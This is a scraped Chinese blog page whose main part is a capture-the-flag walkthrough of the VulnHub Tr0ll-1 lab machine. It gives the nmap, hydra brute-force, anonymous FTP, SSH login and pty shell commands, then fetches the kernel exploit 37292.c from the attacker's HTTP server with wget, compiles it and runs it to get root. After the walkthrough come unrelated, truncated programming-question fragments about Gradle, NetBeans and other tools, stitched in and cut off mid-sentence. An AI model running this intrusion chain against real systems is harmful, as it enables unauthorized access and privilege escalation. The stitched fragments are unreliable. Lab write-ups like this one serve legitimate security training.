- Java锁的逻辑(结合对象头和ObjectMonitor)
- 还在用饼状图?来瞧瞧这些炫酷的百分比可视化新图形(附代码实现)⛵
- 自动注册实体类到EntityFrameworkCore上下文,并适配ABP及ABPVNext
- 基于Sklearn机器学习代码实战
Tr0ll的灵感来源于OSCP实验室内机器的不断拖动.
目标很简单,获取root并从/root目录中获取Proof.txt.
不适合那些容易受挫的人!公平的警告,前方有巨魔! 。
kali 192.168.31.153 Tr0ll-1 192.168.31.35 靶机下载地址: https://www.vulnhub.com/entry/tr0ll-1,100/ 。
环境搭建成功,使用nmap扫描网段ip探测存活主机 。
nmap 192.168.31.0/24
浏览器访问主机http://192.168.31.35,发现是一个暴走图 。
查看页面js源码也是没有任何线索,正常思路走就是对主机web页面和ip进行信息收集 首先我用nmap详细扫描ip的端口信息 。
nmap 192.168.31.35 -sV -O -p- //扫描全端口信息,版本信息,操作系统
此处发现了21 22 80端口 且操作系统是ubuntu的linux系统,先放一边,接下来就是扫描文件目录 。
python3 dirsearch.py -u http://192.168.31.35/ -e*
发现了一个文件robots.txt,添加访问路径查看有一个/secret目录,访问又是一个暴走图并没有有用的线索 。
现在只能从端口入手,首先尝试ftp端口,利用hydra爆破用户名密码 。
hydra -L user.txt -P password.txt 192.168.31.35 -s 21 ftp
得到了用户名为 Anonymous 和一堆弱密码(这里由于爆破时间有点长,只截取了一部分) 。
但是我看网上可以尝试无密码直接登录成功 。
ftp 192.168.31.35
回车完显示需要输入用户名,再回车一次
然后直接登录
回车完发现了有一串英文,意思是此FTP服务器仅为匿名服务器,可以使用图中的英文anonymous无密码登录,为什么使用这个英文呢,是因为目前没有其他线索了,我尝试了其他用户名又是不可以 。
紧接着就是查找新线索,使用ls查看文件,发现有一个流量包lol.pcap 。
在ftp服务器里使用 get lol.pcap将流量包下载到本地 。
get lol.pcap
使用wireshark查看流量包 。
右键点击第一个流量包,追踪TCP流,发现提示是将一些二进制代码放在secret_stuff.txt文本里 。
修改刚刚圈出来在地址框的代码,把0改到2,看到提示说找到一个sup3rs3cr3tdirlol,看到这串字符有dir字样,猜测应该是一个文件或者文件夹 。
到浏览器访问看看http://192.168.31.35/sup3rs3cr3tdirlol,发现也是一个目录,里边还有一个未知文件 roflmao 。
使用kali的wget命令下载到本地查看 。
wget http://192.168.31.35/sup3rs3cr3tdirlol/roflmao
可以利用kali的文件解析命令获取线索,这里我使用strings命令 。
strings roflmao
得到了一堆提示,其中有一段英文提示Find address 0x0856BF to proceed,查找0x0856BF这个地址,再次利用浏览器访问http://192.168.31.35/0x0856BF查看 。
又是一个目录,一个套着一个,这谁猜得到哦... 查看两个目录,发现了是一个用户名字典和密码字典 。
到这突然意识到,应该是ssh的用户和密码,再次使用hydra爆破ssh端口 。
hydra -L which_one_lol.txt -p Pass.txt 192.168.31.35 ssh
一开始使用的是密码文本的参数-P 但是多次爆破均没用,然后换了-p发现密码居然是Pass.txt,又是一个坑 登录ssh 。
ssh overflow@192.168.31.35
Pass.txt
直接获取到webshell了,接着就是提权getshell 。
使用python获取linux框架shell
python -c 'import pty;pty.spawn("/bin/bash")'
开始内网信息收集,查看内核版本信息 。
cat /proc/version
发现是Linux ubuntu 3.13.0版本,老规矩,浏览器搜索漏洞poc或者使用kali的searchsploit命令查看poc脚本 这里为了方便演示,我使用searchsploit命令 。
searchsploit Linux ubuntu 3.13.0
使用第一个c脚本,先将脚本复制到/root下方便操作,再者使用cat查看脚本如何使用 。
find / -name 37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c 37292.c
ls
cat 37292.c
脚本提示需要下载到靶机,使用gcc编译再执行,python3开启http服务,在靶机后台wget下载脚本,但是此处又有一个坑,发现后台并不能随意下载 。
kali:
python3 -m http.server 8989
Tr0ll-1:
find / -writable 2>/dev/null //查看可写入权限的文件
发现有一个临时目录/tmp可写入,进入tmp文件夹,将脚本下载到tmp 。
cd /tmp
wget http://192.168.31.153:8989/37292.c
下载完毕,使用gcc编译37292.c 。
gcc 37292.c -o shell
-o:将编译完的exp存储在自行定义的文件里
chmod +x shell //添加执行权限
./shell //开始执行
id
cd /root
cat proof.txt
1.从nmap扫描到端口再到hydra破解端口 2.使用wireshark流量分析lol.pcap包获取线索 3.strings解析二进制文件查找提示信息 4.利用已知内核漏洞提权getshell 5.最后这个靶机在查看到有很多地方可以写入权限,方法不止一个,但是我这里仅展示最简单的提权方法:利用已知漏洞获取权限 其他拓展思路可以参考此博客: https://blog.csdn.net/weixin_44807430/article/details/128707254 。
最后此篇关于Tr0ll-1项目实战的文章就讲到这里了,如果你想了解更多关于Tr0ll-1项目实战的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
我正在使用 NetBeans 开发 Java 中的 WebService,并使用 gradle 作为依赖管理。 我找到了this article关于使用 gradle 开发 Web 项目。它使用 Gr
我正在将旧项目从 ant 迁移到 gradle(以使用其依赖项管理和构建功能),并且在生成 时遇到问题>eclipse 项目。今天的大问题是因为该项目有一些子项目被拆分成 war 和 jar 包部署到
我已经为这个错误苦苦挣扎了很长时间。如果有帮助的话,我会提供一些问题的快照。请指导我该怎么办????在我看来,它看起来一团糟。 *** glibc detected *** /home/shivam/
我在 Ubuntu 12.10 上运行 NetBeans 7.3。我正在学习 Java Web 开发类(class),因此我有一个名为 jsage8 的项目,其中包含我为该类(class)所做的工作。
我想知道 Codeplex、GitHub 等中是否有任何突出的项目是 C# 和 ASP.NET,甚至只是 C# API 与功能测试 (NUnit) 和模拟(RhinoMocks、NMock 等)。 重
我创建了一个 Maven 项目,包装类型为“jar”,名为“Y”我已经完成了“Maven 安装”,并且可以在我的本地存储库中找到它.. 然后,我创建了另一个项目,包装类型为“war”,称为“X”。在这
我一直在关注the instructions用于将 facebook SDK 集成到我的应用程序中。除了“helloFacebookSample”之外,我已经成功地编译并运行了所有给定的示例应用程序。
我想知道,为什么我们(Java 社区)需要 Apache Harmony 项目,而已经有了 OpenJDK 项目。两者不是都是在开源许可下发布的吗? 最佳答案 事实恰恰相反。 Harmony 的成立是
我正在尝试使用 Jsoup HTML Parser 从网站获取缩略图 URL我需要提取所有以 60x60.jpg(或 png)结尾的 URL(所有缩略图 URL 都以此 URL 结尾) 问题是我让它在
我无法构建 gradle 项目,即使我编辑 gradle 属性,我也会收到以下错误: Error:(22, 1) A problem occurred evaluating root project
我有这个代码: var NToDel:NSArray = [] var addInNToDelArray = "Test1 \ Test2" 如何在 NToDel:NSArray 中添加 addInN
如何在单击显示更多(按钮)后将主题列表限制为 5 个(项目)。 还有 3(项目),依此类推到列表末尾,然后它会显示显示更少(按钮)。 例如:在 Udemy 过滤器选项中,当您点击查看更多按钮时,它仅显
如何将现有的 Flutter 项目导入为 gradle 项目? “导入项目”向导要求 Gradle 主路径。 我有 gradle,安装在我的系统中。但是这里需要设置什么(哪条路径)。 这是我正在尝试的
我有一个关于 Bitbucket 的项目。只有源被提交。为了将项目检索到新机器上,我在 IntelliJ 中使用了 Version Control > Checkout from Ve
所以,我想更改我公司的一个项目,以使用一些与 IDE 无关的设置。我在使用 Tomcat 设置 Java 应用程序方面有非常少的经验(我几乎不记得它是如何工作的)。 因此,为了帮助制作独立于 IDE
我有 2 个独立的项目,一个在 Cocos2dx v3.6 中,一个在 Swift 中。我想从 Swift 项目开始游戏。我该怎么做? 我已经将整个 cocos2dx 项目复制到我的 Swift 项目
Cordova 绝对是新手。这些是我完成的步骤: checkout 现有项目 运行cordova build ios 以上生成此构建错误: (node:10242) UnhandledPromiseR
我正在使用 JQuery 隐藏/显示 li。我的要求是,当我点击任何 li 时,它应该显示但隐藏所有其他 li 项目。当我将鼠标悬停在文本上时 'show all list item but don
我想将我所有的java 项目(223 个项目)迁移到gradle 项目。我正在使用由 SpringSource STS 团队开发的 Gradle Eclipse 插件。 目前,我所有的 java 项目
我下载this Eclipse Luna ,对于 Java EE 开发人员,如描述中所见,它支持 Web 应用程序。我找不到 file -> new -> other -> web projects
我是一名优秀的程序员,十分优秀!